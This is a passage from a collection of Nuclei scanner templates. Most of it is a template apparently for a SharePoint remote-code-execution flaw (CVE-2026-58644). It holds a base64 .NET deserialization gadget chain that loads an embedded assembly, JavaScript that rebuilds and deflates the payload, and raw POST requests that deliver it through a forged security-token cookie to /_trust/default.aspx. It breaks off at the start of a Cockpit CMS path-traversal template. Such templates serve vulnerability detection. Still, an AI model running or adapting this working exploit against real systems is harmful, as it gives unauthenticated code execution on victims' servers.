'/wEykEgAAQAAAP////8BAAAAAAAAAAQBAAAAO1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkxpc3RgMVtbU3lzdGVtLk9iamVjdCxtc2NvcmxpYl1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABeU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLFZlcnNpb249NC4wLjAuMCxDdWx0dXJlPW5ldXRyYWwsUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkhhc2h0YWJsZQcAAAAKTG9hZEZhY3RvcgdWZXJzaW9uCENvbXBhcmVyEEhhc2hDb2RlUHJvdmlkZXIISGFzaFNpemUES2V5cwZWYWx1ZXMAAAMDAAUFCwgcU3lzdGVtLkNvbGxlY3Rpb25zLklDb21wYXJlciRTeXN0ZW0uQ29sbGVjdGlvbnMuSUhhc2hDb2RlUHJvdmlkZXII7FE4PwIAAAAKCgMAAAAJHwAAAAkgAAAADw0AAAAADgAAAk1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAA/gFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAGIgAAAEtTeXN0ZW0uQ29yZSxWZXJzaW9uPTQuMC4wLjAsQ3VsdHVyZT1uZXV0cmFsLFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQEAAAAAcAAAAJAwAAAAoJJAAAAAoICAAAAAAKCAgBAAAAAREAAAAPAAAABiUAAAD1AlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQEgAAAAcAAAAJBAAAAAoJKAAAAAoICAAAAAAKCAgBAAAAARMAAAAPAAAABikAAADfA1N5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBQAAAAHAAAACQUAAAAKCSwAAAAKCAgAAAAACggIAQAAAAEVAAAADwAAAAYtAAAA5gJTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBYAAAAHAAAACQYAAAAJMAAAAAkxAAAACggIAAAAAAoICAEAAAABFwAAAA8AAAAGMgAAAO8BU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQGAAAAAcAAAAJBwAAAAoJNQAAAAoICAAAAAAKCAgBAAAAARkAAAAPAAAABjYAAAApU3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5QYWdlZERhdGFTb3VyY2UEAAAABjcAAABKU3lzdGVtLldlYixWZXJzaW9uPTQuMC4wLjAsQ3VsdHVyZT1uZXV0cmFsLFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EQGgAAAAcAAAAJCAAAAAgIAAAAAAgICgAAAAgBAAgBAAgBAAgIAAAAAAEbAAAADwAAAAY5AAAAKVN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24uRGVzaWduZXJWZXJiBAAAAAY6AAAARlN5c3RlbSxWZXJzaW9uPTQuMC4wLjAsQ3VsdHVyZT1uZXV0cmFsLFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQHAAAAAUAAAANAgk7AAAACAgDAAAACQsAAAABHQAAAA8AAAAGPQAAADRTeXN0ZW0uUnVudGltZS5SZW1vdGluZy5DaGFubmVscy5BZ2dyZWdhdGVEaWN0aW9uYXJ5BAAAAAY+AAAACG1zY29ybGliEB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAAA7U3lzdGVtLkZ1bmNgMltbU3lzdGVtLkJ5dGVbXV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XV0JPgAAAAoJPgAAAAZSAAAAGlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5BlMAAAAETG9hZAoEQwAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgYAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAAMIDVN5c3RlbS5UeXBlW10JUwAAAAk+AAAACVIAAAAGVgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgFEAAAAQgAAAAZXAAAAZVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGVdXV1dCT4AAAAKCT4AAAAJUgAAAAZaAAAACEdldFR5cGVzCgFFAAAAQwAAAAlaAAAACT4AAAAJUgAAAAZdAAAAGFN5c3RlbS5UeXBlW10gR2V0VHlwZXMoKQgAAAAKAUYAAABCAAAABl4AAACCAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlXV1dLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZV1dXV0JPgAAAAoJPgAAAAZgAAAAN1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlXV0GYQAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAlhAAAACT4AAAAJYAAAAAZkAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQgAAAAKAUgAAABCAAAABmUAAABZU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGVdXV0sW1N5c3RlbS5Cb29sZWFuXV0JPgAAAAoJPgAAAAZnAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZoAAAACE1vdmVOZXh0CgFJAAAAQwAAAAloAAAACT4AAAAJZwAAAAZrAAAAEkJvb2xlYW4gTW92ZU5leHQoKQgAAAAKAUoAAABCAAAABmwAAABWU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGVdXV0sW1N5c3RlbS5UeXBlXV0JPgAAAAoJPgAAAAZuAAAAN1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlXV0GbwAAAAtnZXRfQ3VycmVudAoBSwAAAEMAAAAJbwAAAAk+AAAACW4AAAAGcgAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGcwAAACxTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uVHlwZV0sW1N5c3RlbS5PYmplY3RdXQk+AAAACgk+AAAABnUAAAAQU3lzdGVtLkFjdGl2YXRvcgZ2AAAADkNyZWF0ZUluc3RhbmNlCgFNAAAAQwAAAAl2AAAACT4AAAAJdQAAAAZ5AAAAKVN5c3RlbS5PYmplY3QgQ3JlYXRlSW5zdGFuY2UoU3lzdGVtLlR5cGUpCAAAAAoBTgAAAA8AAAAGegAAACZTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduLkNvbW1hbmRJRAQAAAAJOgAAABBPAAAAAgAAAAl8AAAACAgAIAAABHwAAAALU3lzdGVtLkd1aWQLAAAAAl9hAl9iAl9jAl9kAl9lAl9mAl9nAl9oAl9pAl9qAl9rAAAAAAAAAAAAAAAIBwcCAgICAgICAhMT0nTuKtERi/sAoMkPJvcL'\n\nflow: javascript() && http(1) && http(2)\n\njavascript:\n  - code: |\n        const bytess = require(\"nuclei/bytes\");\n\n        function u8(arr) { return new Uint8Array(arr); }\n\n        function strToBuf(str) {\n          var b = new bytess.Buffer();\n          b.WriteString(str);\n          return b;\n        }\n\n        function encode7BitInt(n) {\n          if (n === 0) return new bytess.Buffer(u8([0]));\n          var tmp = [];\n          while (n > 0) {\n            var v = n & 0x7F;\n            n >>>= 7;\n            if (n > 0) v |= 0x80;\n            tmp.push(v);\n          }\n          return new bytess.Buffer(u8(tmp));\n        }\n\n        function replaceAllBytes(hay, needle, repl) {\n          var H = hay.Bytes();\n          var N = needle.Bytes();\n          var out = new bytess.Buffer();\n          for (var i = 0; i < H.length;) {\n            var match = true;\n            for (var j = 0; j < N.length; j++) {\n              if (i + j >= H.length || H[i + j] !== N[j]) { match = false; break; }\n            }\n            if (match) {\n              out.Write(repl.Bytes());\n              i += N.length;\n            } else {\n              out.Write(u8([H[i]]));\n              i++;\n            }\n          }\n          return out;\n        }\n\n        function rawDeflateStored(data) {\n          var bytes = data.Bytes();\n          var maxBlock = 65535;\n          var out = new bytess.Buffer();\n          for (var offset = 0; offset < bytes.length; offset += maxBlock) {\n            var blockSize = Math.min(bytes.length - offset, maxBlock);\n            var isLast = (offset + blockSize >= bytes.length) ? 1 : 0;\n            // BFINAL|BTYPE(00): for stored block BTYPE=00, first byte = BFINAL (1 bit) | 0 | 0\n            out.Write(u8([isLast]));\n            // LEN (2-byte LE) and NLEN = one's complement of LEN (2-byte LE)\n            var nlen = (~blockSize) & 0xFFFF;\n            out.Write(u8([blockSize & 0xFF, (blockSize >> 8) & 0xFF]));\n            out.Write(u8([nlen & 0xFF, (nlen >> 8) & 0xFF]));\n            out.Write(u8(bytes.slice(offset, offset + blockSize)));\n          }\n          return out;\n        }\n\n        // Build DataSet BinaryFormatter gadget with inner gadget replacing HAX placeholder.\n        // HAX is a 3-byte placeholder inside the DataSet BinaryFormatter binary representing\n        // the base64-encoded inner LosFormatter gadget string. The DataSet gadget decodes the\n        // base64 string and passes the binary to LosFormatter.Deserialize().\n        dataset_gadget_raw = strToBuf(atob(dg));\n        dataset_gadget_raw1 = replaceAllBytes(\n          dataset_gadget_raw,\n          strToBuf(\"HAX\"),\n          strToBuf(ig)\n        );\n        dataset_gadget_raw2 = replaceAllBytes(\n          dataset_gadget_raw,\n          strToBuf(\"HAX\"),\n          strToBuf(ig2)\n        );\n\n        var oldLen = encode7BitInt(9163);\n        var newLen = encode7BitInt(9163 - 7772 + ig.length);\n        var newLen2 = encode7BitInt(9163 - 7772 + ig2.length);\n        dataset_gadget_raw1 = replaceAllBytes(dataset_gadget_raw1, oldLen, newLen);\n        dataset_gadget_raw2 = replaceAllBytes(dataset_gadget_raw2, oldLen, newLen2);\n\n        var deflated1 = rawDeflateStored(dataset_gadget_raw1);\n        var deflated2 = rawDeflateStored(dataset_gadget_raw2);\n\n        (btoa(deflated1.String()) + \":\" + btoa(deflated2.String()))\n\n    args:\n      ig: \"{{internal_gadget_b64}}\"\n      ig2: \"{{internal_gadget2_b64}}\"\n      dg: \"{{dataset_gadget_b64}}\"\n\nhttp:\n  - raw:\n      - |\n        GET /_trust/default.aspx HTTP/1.1\n        Host: {{Hostname}}\n        Connection: close\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(tolower(header), \"microsoftsharepointteamservices\")'\n        internal: true\n\n  - raw:\n      - |\n        POST /_trust/default.aspx HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Connection: close\n\n        wa=wsignin1.0&wctx={{url_encode(RootURL + \"/\")}}&wresult={{url_encode(concat('<t:RequestSecurityTokenResponse xmlns:t=\"http://schemas.xmlsoap.org/ws/2005/02/trust\"><t:RequestedSecurityToken><sc:SecurityContextToken xmlns:sc=\"http://schemas.xmlsoap.org/ws/2005/02/sc\"><sc:Identifier>urn:unique-id:securitycontext:nuclei', rand_text_alpha(12), '</sc:Identifier><Cookie xmlns=\"http://schemas.microsoft.com/ws/2006/05/security\">', replace_regex(javascript_response, \":.*\", \"\"), '</Cookie></sc:SecurityContextToken></t:RequestedSecurityToken></t:RequestSecurityTokenResponse>'))}}\n\n      - |\n        POST /_trust/default.aspx HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Connection: close\n\n        wa=wsignin1.0&wctx={{url_encode(RootURL + \"/\")}}&wresult={{url_encode(concat('<t:RequestSecurityTokenResponse xmlns:t=\"http://schemas.xmlsoap.org/ws/2005/02/trust\"><t:RequestedSecurityToken><sc:SecurityContextToken xmlns:sc=\"http://schemas.xmlsoap.org/ws/2005/02/sc\"><sc:Identifier>urn:unique-id:securitycontext:nuclei', rand_text_alpha(12), '</sc:Identifier><Cookie xmlns=\"http://schemas.microsoft.com/ws/2006/05/security\">', replace_regex(javascript_response, \".*:\", \"\"), '</Cookie></sc:SecurityContextToken></t:RequestedSecurityToken></t:RequestSecurityTokenResponse>'))}}\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(tolower(header), \"x-nuclei\")'\n# digest: 4a0a00473045022100d7dbe8f2069ad3cb5310d0349cbf88c5fbf8591a0c4c7f7a1b4c7fbb87c0633f022053efb323e1bf1f983f54dc01482177ffcd089a0cd9ae7bc2dc61e901adb01960:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-58644.yaml","vuln_id":"cve-2026-58644"},{"raw":"id: CVE-2026-58467\n\ninfo:\n  name: Cockpit CMS <= 2.14.0 - Path Traversal / Local File Inclusion\n  author: Abdullah Shahid (comradezephyr)\n  severity: high\n  description: |\n    Cockpit CMS through 2.14.0 contains a path traversal and local file inclusion (LFI) vulnerability when executed under PHP's built-in CLI server (PHP_SAPI == 'cli-server') or non-normalizing reverse proxies. The application fails to sanitize dot-dot sequences in PATH_INFO routes starting with '/:' and containing '/storage/'. Unauthenticated remote attackers can traverse outside the designated directory to read arbitrary system files.\n  impact: |\n    An unauthenticated 